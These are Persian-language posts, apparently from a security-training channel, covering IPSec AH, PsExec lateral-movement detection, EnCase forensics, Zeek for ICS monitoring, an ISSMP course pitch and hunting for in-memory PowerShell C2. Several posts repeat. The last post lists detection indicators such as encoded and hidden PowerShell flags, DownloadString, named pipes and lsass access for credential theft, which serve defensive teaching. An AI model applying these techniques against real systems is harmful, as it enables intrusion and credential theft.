وبینار آشنایی با نحوه آمادگی آزمون CISSP و کار در آلمان برگزار شد
💯3🙏2
نکات عجیب در پروتکل ها
تحلیل Authentication Header (AH) در IPSec: واقعیت فنی و برداشت معماری
روزبه نوروزی
هدر احراز هویت داده یا Authentication Header (AH) در IPSec برای تضمین تمامیت (Integrity) و اصالت (Authenticity) بستههای IP طراحی شده است. برخلاف تصور عمومی، AH در محاسبۀ مقدار بررسی تمامیت (ICV – Integrity Check Value) فقط بخشهایی از هدر IP را در نظر میگیرد و فیلدهایی را که در طول مسیر تغییر میکنند، بهطور عمدی نادیده میگیرد یا مقدارشان را صفر میکند.
بر اساس استاندارد RFC 4302، فیلدهایی مانند TTL، TOS، Checksum و برخی Options در دستهٔ «Mutable Fields» قرار میگیرند و در محاسبهٔ ICV منظور نمیشوند. در مقابل، فیلدهایی نظیر Source/Destination Address، Protocol Number و Total Length «Immutable» تلقی میشوند و هر تغییری در آنها باعث نامعتبر شدن امضاء AH خواهد شد. این طراحی دقیقاً برای سازگاری با رفتار واقعی مسیریابها انجام شده است تا تغییرات طبیعی شبکه (مثل کاهش TTL) موجب خطا نشود.
با این حال، AH همچنان با مشکل اساسی در محیطهای NAT (Network Address Translation) روبهروست. NAT آدرسهای IP مبدأ و مقصد را تغییر میدهد؛ چون این فیلدها Immutable هستند، مقدار ICV در مقصد دیگر معتبر نخواهد بود. در حالت Transport Mode، این مسئله AH را عملاً بیاستفاده میکند. در Tunnel Mode، اگر NAT روی Outer Header اجرا شود و Inner Header دستنخورده بماند، AH هنوز کارکرد دارد ؛ هرچند در عمل اغلب با ESP (Encapsulating Security Payload) جایگزین میشود، زیرا ESP هم Integrity و هم Confidentiality را تأمین میکند.
از دید معماری امنیتی(متخصصCISSP) ، AH نمونهای از طراحی هوشمندانهای است که تضاد میان تئوری رمزنگاری و عملکرد پویا و غیرقطعی شبکه را کنترل میکند. درس اصلی این است: امنیت مؤثر نه در حذف تغییرات، بلکه در پیشبینی و مدیریت آنهاست.
از نظر مفهومی، AH ادعا میکند تمام هدر IP را “authenticate” میکند،
اما از نظر واقعی، بخشهایی از همان هدر را عمداً نادیده میگیرد!
اگر بیش از حد سختگیر باشی (امضای همهچیز)، ارتباط در دنیای واقعی شکست میخورد؛اگر خیلی آسانگیر شوی، امنیت از بین میرود.
پس مهندسان مجبور شدند میانهای میان رمزنگاری و واقعیت مسیریابی پیدا کنند ؛ چیزی که در هیچ پروتکل امنیتی دیگر بهاینشکل دیده نمیشود.
همین پارادوکس، IPSec AH را هم از نظر رمزنگاری جذاب و هم از نظر معماری شبکه یکی از عجیبترین شاهکارهای دنیای امنیت ساخته است.
#آکادمی_روزبه www.haumoun.com
مرکز تخصصی CISSP و ISSMP
تحلیل Authentication Header (AH) در IPSec: واقعیت فنی و برداشت معماری
روزبه نوروزی
هدر احراز هویت داده یا Authentication Header (AH) در IPSec برای تضمین تمامیت (Integrity) و اصالت (Authenticity) بستههای IP طراحی شده است. برخلاف تصور عمومی، AH در محاسبۀ مقدار بررسی تمامیت (ICV – Integrity Check Value) فقط بخشهایی از هدر IP را در نظر میگیرد و فیلدهایی را که در طول مسیر تغییر میکنند، بهطور عمدی نادیده میگیرد یا مقدارشان را صفر میکند.
بر اساس استاندارد RFC 4302، فیلدهایی مانند TTL، TOS، Checksum و برخی Options در دستهٔ «Mutable Fields» قرار میگیرند و در محاسبهٔ ICV منظور نمیشوند. در مقابل، فیلدهایی نظیر Source/Destination Address، Protocol Number و Total Length «Immutable» تلقی میشوند و هر تغییری در آنها باعث نامعتبر شدن امضاء AH خواهد شد. این طراحی دقیقاً برای سازگاری با رفتار واقعی مسیریابها انجام شده است تا تغییرات طبیعی شبکه (مثل کاهش TTL) موجب خطا نشود.
با این حال، AH همچنان با مشکل اساسی در محیطهای NAT (Network Address Translation) روبهروست. NAT آدرسهای IP مبدأ و مقصد را تغییر میدهد؛ چون این فیلدها Immutable هستند، مقدار ICV در مقصد دیگر معتبر نخواهد بود. در حالت Transport Mode، این مسئله AH را عملاً بیاستفاده میکند. در Tunnel Mode، اگر NAT روی Outer Header اجرا شود و Inner Header دستنخورده بماند، AH هنوز کارکرد دارد ؛ هرچند در عمل اغلب با ESP (Encapsulating Security Payload) جایگزین میشود، زیرا ESP هم Integrity و هم Confidentiality را تأمین میکند.
از دید معماری امنیتی(متخصصCISSP) ، AH نمونهای از طراحی هوشمندانهای است که تضاد میان تئوری رمزنگاری و عملکرد پویا و غیرقطعی شبکه را کنترل میکند. درس اصلی این است: امنیت مؤثر نه در حذف تغییرات، بلکه در پیشبینی و مدیریت آنهاست.
از نظر مفهومی، AH ادعا میکند تمام هدر IP را “authenticate” میکند،
اما از نظر واقعی، بخشهایی از همان هدر را عمداً نادیده میگیرد!
اگر بیش از حد سختگیر باشی (امضای همهچیز)، ارتباط در دنیای واقعی شکست میخورد؛اگر خیلی آسانگیر شوی، امنیت از بین میرود.
پس مهندسان مجبور شدند میانهای میان رمزنگاری و واقعیت مسیریابی پیدا کنند ؛ چیزی که در هیچ پروتکل امنیتی دیگر بهاینشکل دیده نمیشود.
همین پارادوکس، IPSec AH را هم از نظر رمزنگاری جذاب و هم از نظر معماری شبکه یکی از عجیبترین شاهکارهای دنیای امنیت ساخته است.
#آکادمی_روزبه www.haumoun.com
مرکز تخصصی CISSP و ISSMP
❤🔥5❤2
تجربه شخصی در شناسایی سوءاستفاده از PsExec.exe
در یکی از ممیزیهای امنیتی که در محیط Windows Enterprise انجام شد، متوجه حجم بالایی از ترافیک SMB غیرعادی بین چند سرور اپلیکیشن شدم. در نگاه اول به نظر میرسید که عملیات مدیریتی معمولی در حال انجام است، اما بررسی عمیقتر لاگهای Sysmon و Event ID 7045 نشان داد که سرویسهایی با نامهای تصادفی در حال ایجاد و حذف پیدرپی هستند؛ الگوی شناختهشدهای از اجرای دستورات با استفاده از PsExec.exe.
ابزار PsExec در ذات خود ابزاری مدیریتی و کارآمد است، اما در سناریوهای واقعی مهاجمان معمولاً آن را به عنوان بخشی از فاز Lateral Movement برای گسترش دسترسی پس از نفوذ اولیه استفاده میکنند. در این مورد خاص، اجرای نسخهای امضاشده اما تغییریافته از PsExec باعث شد traditional AV هیچ آلارمی تولید نکند. تنها از طریق Telemetry سطح فرآیند (Process Creation + Network Connect) توانستیم فعالیت را در SOC شناسایی کنیم.
پس از تحلیل، سیاستهای جدیدی در EDR و GPO تعریف شد تا از اجرای PsExec خارج از مسیرهای مجاز (مانند %SystemRoot%\System32) جلوگیری شود. همچنین در سطح SIEM، همبستگی بین Event ID 7045، CreationTime در Sysmon، و SMB Session Setup با کلید Username معتبرسازی شد تا بتوانیم فعالیت مشابه را در آینده سریعتر شناسایی کنیم
انتقال تجربیات در
دوره های سطح ۱ و ۲
واتس اپ 09902857290
در یکی از ممیزیهای امنیتی که در محیط Windows Enterprise انجام شد، متوجه حجم بالایی از ترافیک SMB غیرعادی بین چند سرور اپلیکیشن شدم. در نگاه اول به نظر میرسید که عملیات مدیریتی معمولی در حال انجام است، اما بررسی عمیقتر لاگهای Sysmon و Event ID 7045 نشان داد که سرویسهایی با نامهای تصادفی در حال ایجاد و حذف پیدرپی هستند؛ الگوی شناختهشدهای از اجرای دستورات با استفاده از PsExec.exe.
ابزار PsExec در ذات خود ابزاری مدیریتی و کارآمد است، اما در سناریوهای واقعی مهاجمان معمولاً آن را به عنوان بخشی از فاز Lateral Movement برای گسترش دسترسی پس از نفوذ اولیه استفاده میکنند. در این مورد خاص، اجرای نسخهای امضاشده اما تغییریافته از PsExec باعث شد traditional AV هیچ آلارمی تولید نکند. تنها از طریق Telemetry سطح فرآیند (Process Creation + Network Connect) توانستیم فعالیت را در SOC شناسایی کنیم.
پس از تحلیل، سیاستهای جدیدی در EDR و GPO تعریف شد تا از اجرای PsExec خارج از مسیرهای مجاز (مانند %SystemRoot%\System32) جلوگیری شود. همچنین در سطح SIEM، همبستگی بین Event ID 7045، CreationTime در Sysmon، و SMB Session Setup با کلید Username معتبرسازی شد تا بتوانیم فعالیت مشابه را در آینده سریعتر شناسایی کنیم
انتقال تجربیات در
دوره های سطح ۱ و ۲
واتس اپ 09902857290
❤8🙏3
چرا پیشنهاد میکنم هر سازمان یک EnCase داشته باشد
روزبه نوروزی
دلیل اینکه EnCase یکی از ابزارهای معتبر و پذیرفتهشده برای ارائهی ادلهی دیجیتال در دادگاهها (هم در نظام حقوقی آمریکا و هم در کشورهایی با استاندارد مشابه) محسوب میشود، به چند ویژگی بنیادین آن در حوزهی Forensic Soundness و Evidence Handling برمیگردد:
🔹 ۱. حفظ کامل اصل شواهد (Forensic Image Creation)
در EnCase برای جمعآوری داده از رسانهها، از bit‑by‑bit imaging استفاده میشود
یعنی هر بیت از دیسک مظنون (حتی فضای آزاد و deleted sectors) دقیقاً و بدون هیچ تغییری کپی میشود.
به این ترتیب، بررسی روی کپی مجاز (forensic image) انجام میشود نه روی منبع اصلی. این کار:
مانع آلوده شدن شواهد واقعی میشود؛
و زنجیرهی مالکیت (Chain of Custody) حفظ میشود.
🔹 ۲. محاسبه و تأیید هش (Cryptographic Hash Verification)
ابزار در لحظهی ایمیجگیری، مقادیر MD5 و SHA1/SHA256 از دادهها تولید میکند و در گزارش Chain of Custody ذخیره میکند.
در هر مرحله بعدی (تحلیل، انتقال، بایگانی) هش دوباره محاسبه میشود تا ثابت شود:
شواهد هیچگونه تغییری نکردهاند.
این موضوع از نظر دادگاهها شرط کلیدی برای قابلیت پذیرش ادله است.
🔹 ۳. گزارشدهی و مستندسازی قانونی (Court‑Admissible Reporting)
ابزار EnCase همهی فعالیتها را در فایل Log غیرقابل ویرایش ثبت میکند:
زمان ایمیجگیری
نام تحلیلگر
مسیرها و تنظیمات ابزار
نسخه نرمافزار و افزونهها
خروجی نهایی هم در قالب گزارش رسمی قابل پرینت و آرشیو است که در نظام حقوقی مبتنی بر ISO/IEC 27037 و NIST SP 800‑86 به عنوان سند رسمی پذیرفته میشود.
🔹 ۴. روش علمی و تأییدشده (Validated Methodology)
در بسیاری از کشورها (مثل امریکا)، ابزارهایی که در دادگاه پذیرفته میشوند باید معیارهای Daubert یا Frye را تأمین کنند:
روششان علمی و قابل بازتولید باشد،
در جامعهی فنی مورد پذیرش قرار گرفته باشد،
و نرخ خطای شناختهشده و پایین داشته باشد.
ابزار EnCase به عنوان یک محصول validated با سابقهی استناد در صدها پرونده، این معیارها را داراست.
🔹 ۵. زنجیرهی مالکیت دیجیتال یکپارچه (Integrated Chain of Custody)
در نسخههای جدید ، ماژول Chain of Custody به صورت خودکار برای هر شواهد دیجیتال تولید میشود و هر انتقال یا مشاهده ثبت میگردد. این باعث میشود که گزارش خروجی بتواند مستقیماً به عنوان بخشی از پرونده قضایی الصاق شود.
🔹 ۶. قابلیت بازیابی بدون تغییر و تحلیل عمیق
ابزار EnCase میتواند دادهها را (ایمیلها، فایلهای حذفشده، متادیتاها، Registry، File Slacks و …) بازسازی کند بدون آنکه محتویات فایل یا زمانبندیها را بنویسد یا دستکاری کند.
این قابلیت نشان میدهد که تحلیلگر از روش Read‑Only استفاده کرده، و از دیدگاه حقوقی “عدم تغییر ادله” رعایت شده است و به هدف Chain of Custody نائل شده ایم.
#آکادمی_روزبه
روزبه نوروزی
دلیل اینکه EnCase یکی از ابزارهای معتبر و پذیرفتهشده برای ارائهی ادلهی دیجیتال در دادگاهها (هم در نظام حقوقی آمریکا و هم در کشورهایی با استاندارد مشابه) محسوب میشود، به چند ویژگی بنیادین آن در حوزهی Forensic Soundness و Evidence Handling برمیگردد:
🔹 ۱. حفظ کامل اصل شواهد (Forensic Image Creation)
در EnCase برای جمعآوری داده از رسانهها، از bit‑by‑bit imaging استفاده میشود
یعنی هر بیت از دیسک مظنون (حتی فضای آزاد و deleted sectors) دقیقاً و بدون هیچ تغییری کپی میشود.
به این ترتیب، بررسی روی کپی مجاز (forensic image) انجام میشود نه روی منبع اصلی. این کار:
مانع آلوده شدن شواهد واقعی میشود؛
و زنجیرهی مالکیت (Chain of Custody) حفظ میشود.
🔹 ۲. محاسبه و تأیید هش (Cryptographic Hash Verification)
ابزار در لحظهی ایمیجگیری، مقادیر MD5 و SHA1/SHA256 از دادهها تولید میکند و در گزارش Chain of Custody ذخیره میکند.
در هر مرحله بعدی (تحلیل، انتقال، بایگانی) هش دوباره محاسبه میشود تا ثابت شود:
شواهد هیچگونه تغییری نکردهاند.
این موضوع از نظر دادگاهها شرط کلیدی برای قابلیت پذیرش ادله است.
🔹 ۳. گزارشدهی و مستندسازی قانونی (Court‑Admissible Reporting)
ابزار EnCase همهی فعالیتها را در فایل Log غیرقابل ویرایش ثبت میکند:
زمان ایمیجگیری
نام تحلیلگر
مسیرها و تنظیمات ابزار
نسخه نرمافزار و افزونهها
خروجی نهایی هم در قالب گزارش رسمی قابل پرینت و آرشیو است که در نظام حقوقی مبتنی بر ISO/IEC 27037 و NIST SP 800‑86 به عنوان سند رسمی پذیرفته میشود.
🔹 ۴. روش علمی و تأییدشده (Validated Methodology)
در بسیاری از کشورها (مثل امریکا)، ابزارهایی که در دادگاه پذیرفته میشوند باید معیارهای Daubert یا Frye را تأمین کنند:
روششان علمی و قابل بازتولید باشد،
در جامعهی فنی مورد پذیرش قرار گرفته باشد،
و نرخ خطای شناختهشده و پایین داشته باشد.
ابزار EnCase به عنوان یک محصول validated با سابقهی استناد در صدها پرونده، این معیارها را داراست.
🔹 ۵. زنجیرهی مالکیت دیجیتال یکپارچه (Integrated Chain of Custody)
در نسخههای جدید ، ماژول Chain of Custody به صورت خودکار برای هر شواهد دیجیتال تولید میشود و هر انتقال یا مشاهده ثبت میگردد. این باعث میشود که گزارش خروجی بتواند مستقیماً به عنوان بخشی از پرونده قضایی الصاق شود.
🔹 ۶. قابلیت بازیابی بدون تغییر و تحلیل عمیق
ابزار EnCase میتواند دادهها را (ایمیلها، فایلهای حذفشده، متادیتاها، Registry، File Slacks و …) بازسازی کند بدون آنکه محتویات فایل یا زمانبندیها را بنویسد یا دستکاری کند.
این قابلیت نشان میدهد که تحلیلگر از روش Read‑Only استفاده کرده، و از دیدگاه حقوقی “عدم تغییر ادله” رعایت شده است و به هدف Chain of Custody نائل شده ایم.
#آکادمی_روزبه
❤7
تجربه عملیاتی با تغییرات عمدی
در زیر یک نوشته در خصوص لزوم استفاده از زیک بجای اسپلانک در شبکه های کنترل صنعتی نظیر گاز و پتروشیمی و برق رو با تغییراتی که اونو قابل ارائه کنه مینگارم
خلاصه مقایسه Zeek و Splunk Stream در شبکههای صنعتی (ICS)
تفاوت بنیادین بین Zeek و Splunk Stream در یک سناریوی تخصصی مانند شبکههای کنترل صنعتی (ICS) به وضوح آشکار میشود. فرض کنید هدف، شناسایی یک فرمان خطرناک و غیرمجاز (مانند توقف PLC) است که از طریق پروتکل صنعتی S7comm به یک کنترلگر زیمنس ارسال میشود.
ابزار Zeek، به لطف معماری متنباز و انعطافپذیر خود، در این سناریو عملکردی خوب دارد. حتی اگر پروتکل S7comm به صورت پیشفرض پشتیبانی نشود، تیم امنیتی میتواند با نصب یک پکیج تحلیلگر از جامعه کاربری یا نوشتن یک اسکریپت سفارشی، به Zeek «یاد بدهد» که ساختار این پروتکل را بفهمد. با این توانایی، Zeek میتواند ترافیک را به رویدادهای معنادار مانند plc_stop_request یا program_download_request ترجمه کند. سپس، با یک اسکریپت ساده، میتوان یک منطق امنیتی تعریف کرد: «اگر فرمان plc_stop_request از هر منبعی غیر از ایستگاه مهندسی مجاز ارسال شد، یک هشدار با اولویت بالا تولید کن». نتیجه، یک هشدار دقیق، غنی از زمینه و کاملاً قابل اقدام است که مستقیماً به ماهیت تهدید اشاره دارد.
در مقابل، Splunk Stream که یک محصول تجاری با رویکرد «پیکربندی-محور» است، در این سناریو با چالش جدی مواجه میشود. از آنجایی که پروتکلهای خاص صنعتی مانند S7comm معمولاً در لیست پروتکلهای پیشفرض آن قرار ندارند، Stream قادر به درک محتوای بستهها نیست. این ابزار ترافیک را صرفاً به عنوان یک جریان TCP عمومی شناسایی کرده و فرادادههای پایهای مانند IP مبدأ و مقصد و حجم داده را ثبت میکند. لاگ حاصل فاقد زمینه لازم برای تصمیمگیری است و نمیتواند بین یک فرمان خطرناک و یک ارتباط عادی تمایز قائل شود. کاربران نهایی نمیتوانند قابلیت تحلیل پروتکل جدید را به Stream اضافه کنند و کاملاً به نقشه راه توسعه محصول توسط شرکت Splunk وابسته هستند.
به طور خلاصه، Zeek به عنوان یک پلتفرم قدرتمند و قابل سفارشیسازی، ابزار ایدهآل برای محیطهای پیچیده و تخصصی است، در حالی که Splunk Stream به عنوان یک محصول کاربرپسند، در تحلیل پروتکلهای استاندارد IT بهترین عملکرد را دارد و در مواجهه با نیازهای سفارشی، انعطافپذیری محدودی از خود نشان میدهد.
#انتقال_تجربه
در زیر یک نوشته در خصوص لزوم استفاده از زیک بجای اسپلانک در شبکه های کنترل صنعتی نظیر گاز و پتروشیمی و برق رو با تغییراتی که اونو قابل ارائه کنه مینگارم
خلاصه مقایسه Zeek و Splunk Stream در شبکههای صنعتی (ICS)
تفاوت بنیادین بین Zeek و Splunk Stream در یک سناریوی تخصصی مانند شبکههای کنترل صنعتی (ICS) به وضوح آشکار میشود. فرض کنید هدف، شناسایی یک فرمان خطرناک و غیرمجاز (مانند توقف PLC) است که از طریق پروتکل صنعتی S7comm به یک کنترلگر زیمنس ارسال میشود.
ابزار Zeek، به لطف معماری متنباز و انعطافپذیر خود، در این سناریو عملکردی خوب دارد. حتی اگر پروتکل S7comm به صورت پیشفرض پشتیبانی نشود، تیم امنیتی میتواند با نصب یک پکیج تحلیلگر از جامعه کاربری یا نوشتن یک اسکریپت سفارشی، به Zeek «یاد بدهد» که ساختار این پروتکل را بفهمد. با این توانایی، Zeek میتواند ترافیک را به رویدادهای معنادار مانند plc_stop_request یا program_download_request ترجمه کند. سپس، با یک اسکریپت ساده، میتوان یک منطق امنیتی تعریف کرد: «اگر فرمان plc_stop_request از هر منبعی غیر از ایستگاه مهندسی مجاز ارسال شد، یک هشدار با اولویت بالا تولید کن». نتیجه، یک هشدار دقیق، غنی از زمینه و کاملاً قابل اقدام است که مستقیماً به ماهیت تهدید اشاره دارد.
در مقابل، Splunk Stream که یک محصول تجاری با رویکرد «پیکربندی-محور» است، در این سناریو با چالش جدی مواجه میشود. از آنجایی که پروتکلهای خاص صنعتی مانند S7comm معمولاً در لیست پروتکلهای پیشفرض آن قرار ندارند، Stream قادر به درک محتوای بستهها نیست. این ابزار ترافیک را صرفاً به عنوان یک جریان TCP عمومی شناسایی کرده و فرادادههای پایهای مانند IP مبدأ و مقصد و حجم داده را ثبت میکند. لاگ حاصل فاقد زمینه لازم برای تصمیمگیری است و نمیتواند بین یک فرمان خطرناک و یک ارتباط عادی تمایز قائل شود. کاربران نهایی نمیتوانند قابلیت تحلیل پروتکل جدید را به Stream اضافه کنند و کاملاً به نقشه راه توسعه محصول توسط شرکت Splunk وابسته هستند.
به طور خلاصه، Zeek به عنوان یک پلتفرم قدرتمند و قابل سفارشیسازی، ابزار ایدهآل برای محیطهای پیچیده و تخصصی است، در حالی که Splunk Stream به عنوان یک محصول کاربرپسند، در تحلیل پروتکلهای استاندارد IT بهترین عملکرد را دارد و در مواجهه با نیازهای سفارشی، انعطافپذیری محدودی از خود نشان میدهد.
#انتقال_تجربه
👏4⚡1🙏1
ثبت نام دوره های زیر شروع شد:
امنیت سطح ۱ و ۲ و CISSP
واتس اپ و بله 09902857290
امنیت سطح ۱ و ۲ و CISSP
واتس اپ و بله 09902857290
❤3
بازآفرینی حکمرانی امنیت اطلاعات در ایران: نقش کلیدی متخصص ISSMP
زیرساخت امنیت اطلاعات در ایران از سه چالش ساختاری بنیادین رنج میبرد: فقدان آموزشهای استراتژیک برای مدیران فناوری اطلاعات، عدم تخصیص بودجه بر مبنای تحلیل ریسک، و انتصاب مدیران فاقد صلاحیت حرفهای در مناصب حساس امنیتی. این ضعفها منجر به رویکردی واکنشی و ابزارمحور شده است که در آن، امنیت بهعنوان یک هزینه سربار تلقی میشود، نه یک سرمایهگذاری استراتژیک. دوره تخصصی ISSMP (Information Systems Security Management Professional) بهطور مستقیم برای رفع این شکافها طراحی شده و میتواند گذار از امنیت فنی صرف به «حکمرانی امنیت» را در سازمانهای ایرانی ممکن سازد.
محور اصلی آموزش ISSMP، توانمندسازی مدیران برای رهبری امنیت در سطح کلان سازمانی است. در بُعد رهبری امنیت (Security Leadership)، این متخصص میآموزد که چگونه مفاهیم پیچیده امنیتی را به زبان کسبوکار و در قالب تحلیلهای هزینه-فایده برای مدیران ارشد ترجمه کند. بهجای درخواستهای فنی مانند «خرید فایروال جدید»، او قادر خواهد بود ضرورت سرمایهگذاری امنیتی را با نمایش تأثیر مستقیم آن بر کاهش ریسکهای مالی و اعتباری توجیه نماید؛ مهارتی که حلقه مفقوده در بسیاری از سازمانهای ماست.
در حوزه مدیریت برنامه (Program Management)، متخصص ISSMP با بهرهگیری از چارچوبهای استاندارد جهانی نظیر NIST CSF و ISO 27001، یک «برنامه جامع امنیتی» طراحی میکند که تمامی فعالیتهای فنی و پروژههای پراکنده را زیر یک چتر واحد و استراتژیک هماهنگ میسازد. این رویکرد یکپارچه از هدررفت منابع و تصمیمگیریهای جزیرهای جلوگیری میکند. همچنین، در بُعد مدیریت ریسک (Risk Management)، او امنیت را از یک مرکز هزینه به یک ابزار استراتژیک برای محافظت از داراییهای سازمان تبدیل میکند و سرمایهگذاریها را مستقیماً به تهدیدات واقعی پیوند میزند.
در نهایت، با تأکید بر اخلاق حرفهای و انطباق (Ethics & Compliance)، متخصص ISSMP فرهنگی مبتنی بر شفافیت، پاسخگویی و مسئولیتپذیری را در سازمان نهادینه میکند. این فرهنگ، پادزهری قدرتمند در برابر نفوذهای غیرحرفهای و تصمیمات سفارشی است. بهطور خلاصه، تربیت چنین متخصصانی دیگر یک انتخاب نیست، بلکه یک ضرورت برای بلوغ و پایداری امنیت در اکوسیستم دیجیتال ایران محسوب میشود.
تماس برای دوره های سازمانی 09902857290
Www.haumoun.com
زیرساخت امنیت اطلاعات در ایران از سه چالش ساختاری بنیادین رنج میبرد: فقدان آموزشهای استراتژیک برای مدیران فناوری اطلاعات، عدم تخصیص بودجه بر مبنای تحلیل ریسک، و انتصاب مدیران فاقد صلاحیت حرفهای در مناصب حساس امنیتی. این ضعفها منجر به رویکردی واکنشی و ابزارمحور شده است که در آن، امنیت بهعنوان یک هزینه سربار تلقی میشود، نه یک سرمایهگذاری استراتژیک. دوره تخصصی ISSMP (Information Systems Security Management Professional) بهطور مستقیم برای رفع این شکافها طراحی شده و میتواند گذار از امنیت فنی صرف به «حکمرانی امنیت» را در سازمانهای ایرانی ممکن سازد.
محور اصلی آموزش ISSMP، توانمندسازی مدیران برای رهبری امنیت در سطح کلان سازمانی است. در بُعد رهبری امنیت (Security Leadership)، این متخصص میآموزد که چگونه مفاهیم پیچیده امنیتی را به زبان کسبوکار و در قالب تحلیلهای هزینه-فایده برای مدیران ارشد ترجمه کند. بهجای درخواستهای فنی مانند «خرید فایروال جدید»، او قادر خواهد بود ضرورت سرمایهگذاری امنیتی را با نمایش تأثیر مستقیم آن بر کاهش ریسکهای مالی و اعتباری توجیه نماید؛ مهارتی که حلقه مفقوده در بسیاری از سازمانهای ماست.
در حوزه مدیریت برنامه (Program Management)، متخصص ISSMP با بهرهگیری از چارچوبهای استاندارد جهانی نظیر NIST CSF و ISO 27001، یک «برنامه جامع امنیتی» طراحی میکند که تمامی فعالیتهای فنی و پروژههای پراکنده را زیر یک چتر واحد و استراتژیک هماهنگ میسازد. این رویکرد یکپارچه از هدررفت منابع و تصمیمگیریهای جزیرهای جلوگیری میکند. همچنین، در بُعد مدیریت ریسک (Risk Management)، او امنیت را از یک مرکز هزینه به یک ابزار استراتژیک برای محافظت از داراییهای سازمان تبدیل میکند و سرمایهگذاریها را مستقیماً به تهدیدات واقعی پیوند میزند.
در نهایت، با تأکید بر اخلاق حرفهای و انطباق (Ethics & Compliance)، متخصص ISSMP فرهنگی مبتنی بر شفافیت، پاسخگویی و مسئولیتپذیری را در سازمان نهادینه میکند. این فرهنگ، پادزهری قدرتمند در برابر نفوذهای غیرحرفهای و تصمیمات سفارشی است. بهطور خلاصه، تربیت چنین متخصصانی دیگر یک انتخاب نیست، بلکه یک ضرورت برای بلوغ و پایداری امنیت در اکوسیستم دیجیتال ایران محسوب میشود.
تماس برای دوره های سازمانی 09902857290
Www.haumoun.com
👏4❤1
شکار تهدیدات پیشرفته: روشهای شناسایی چارچوبهای C2 مبتنی بر PowerShell در حافظه
مقدمه: چالش حملات بدون فایل (Fileless Attacks)
در سناریوهای پس از نفوذ (Post-Exploitation)، مهاجمان حرفهای برای حفظ کنترل پایدار و پنهان بر روی سیستمهای قربانی، از چارچوبهای فرمان و کنترل (C2) پیشرفتهای مانند PowerShell Empire و Covenant استفاده میکنند. ویژگی اصلی این ابزارها، اجرای کدها مستقیماً در حافظه (Memory-Resident Execution) است. این تکنیک به مهاجم اجازه میدهد تا اسکریپتهای مخرب PowerShell را بدون ایجاد هیچ فایلی روی دیسک اجرا کند و در نتیجه، از دید بسیاری از آنتیویروسهای سنتی که بر اسکن فایلها متمرکز هستند، پنهان بماند.
مهاجم معمولاً با استفاده از دستوراتی مانند Invoke-Expression (IEX) یا پارامتر -EncodedCommand، اسکریپتهای خود را رمزگذاری (Encode) کرده و از طریق کانالهای ارتباطی رایج مانند HTTP، HTTPS یا SMB به سرور C2 متصل میشود. این امر باعث میشود ترافیک شبکه ظاهری کاملاً عادی داشته باشد، در حالی که در واقعیت، سیستم تحت کنترل کامل مهاجم قرار دارد.
بخش اول: تغییر رویکرد دفاعی؛ از فایل به رفتار
برای کشف این نوع فعالیتهای مخفیانه، تیمهای امنیتی باید تمرکز خود را از تحلیل «فایلهای مخرب» به سمت نظارت بر «رفتار فرآیندها و تغییرات حافظه» معطوف کنند. سرنخهای اصلی شناسایی این حملات، در خودِ فرآیندهای PowerShell و نحوه اجرای آنها نهفته است.
بخش دوم: ابزارها و تکنیکهای کلیدی برای شناسایی
۱. فعالسازی لاگهای پیشرفته PowerShell:
اولین و مهمترین گام، فعالسازی قابلیتهای ثبت لاگ داخلی PowerShell است. این قابلیتها دید عمیقی از کدهای اجراشده فراهم میکنند:
Script Block Logging (Event ID 4104): این لاگ، محتوای کامل اسکریپتهای اجراشده را ثبت میکند، حتی اگر رمزگذاری شده یا در حافظه اجرا شوند. تحلیلگران با بررسی این رویداد میتوانند کدهای مخفیشده در دستورات IEX یا -EncodedCommand را مشاهده کنند.
Module Logging (Event ID 4103): این قابلیت، جزئیات بارگذاری ماژولهای PowerShell و فراخوانی توابع مختلف را ثبت میکند که میتواند برای شناسایی رفتارهای غیرعادی مفید باشد.
۲. نظارت عمیق بر فرآیندها با Sysmon:
ابزار Sysmon (بخشی از مجموعه Sysinternals) یک ابزار قدرتمند برای نظارت بر فعالیتهای سطح سیستمعامل است. با نصب و پیکربندی صحیح Sysmon، میتوان رویدادهای حیاتی زیر را که مستقیماً به حملات PowerShell مرتبط هستند، ثبت و تحلیل کرد:
Event ID 1: Process Creation: ایجاد هر فرآیند PowerShell را به همراه پارامترهای خط فرمان آن ثبت میکند. وجود پارامترهای مشکوکی مانند -e, -enc, IEX, -nop, -w hidden یا DownloadString در این لاگ، یک نشانه خطر جدی است.
Event ID 17 & 18: Pipe Created/Connected: ابزارهایی مانند Empire برای ارتباط بین اجزای خود در داخل یک سیستم (Lateral Movement) از Named Pipe استفاده میکنند. شناسایی Pipeهایی با نامهای غیرمتعارف (مانند \\.\pipe\MSSE-*.server) میتواند نشاندهنده فعالیت C2 داخلی باشد.
Event ID 10: Process Access: این رویداد، دسترسی یک فرآیند به حافظه فرآیند دیگر را ثبت میکند. دسترسی غیرعادی یک فرآیند PowerShell یا rundll32.exe به حافظه فرآیند lsass.exe (که وظیفه مدیریت اعتبارسنجیها را بر عهده دارد)، یک نشانه قوی از تلاش برای سرقت اطلاعات هویتی با ابزارهایی مانند Mimikatz است.
بخش سوم: تحلیل دادهها و شکار تهدید (Threat Hunting)
پس از جمعآوری لاگها از منابع فوق، باید آنها را در یک پلتفرم مدیریت اطلاعات و رخدادهای امنیتی (SIEM) متمرکز کرده و تحلیل نمود. تحلیلگران میتوانند با استفاده از کوئریهای هدفمند، به شکار این تهدیدات بپردازند:
جستجوی رشتههای Base64 طولانی: دستورات -EncodedCommand از رمزگذاری Base64 استفاده میکنند. جستجوی فرآیندهای PowerShell که دارای رشتههای Base64 بسیار طولانی در خط فرمان خود هستند، یک تکنیک شکار مؤثر است.
ارتباطات شبکهای مشکوک: بررسی فرآیندهای PowerShell که ارتباطات شبکهای به خارج از سازمان برقرار میکنند، بهویژه اگر از مسیرهای غیرمعمول مانند پوشه Temp اجرا شده باشند.
تحلیل User-Agent در لاگهای پراکسی: چارچوبهای C2 معمولاً از User-Agentهای خاص یا غیرمرسومی در ارتباطات HTTP/HTTPS خود استفاده میکنند. شناسایی این الگوها در لاگهای وبپراکسی میتواند به کشف سرورهای C2 کمک کند.
ثبت نام دوره های امنیت سطح ۱ و ۲
واتس اپ 09902857290
Www.haumoun.com
مقدمه: چالش حملات بدون فایل (Fileless Attacks)
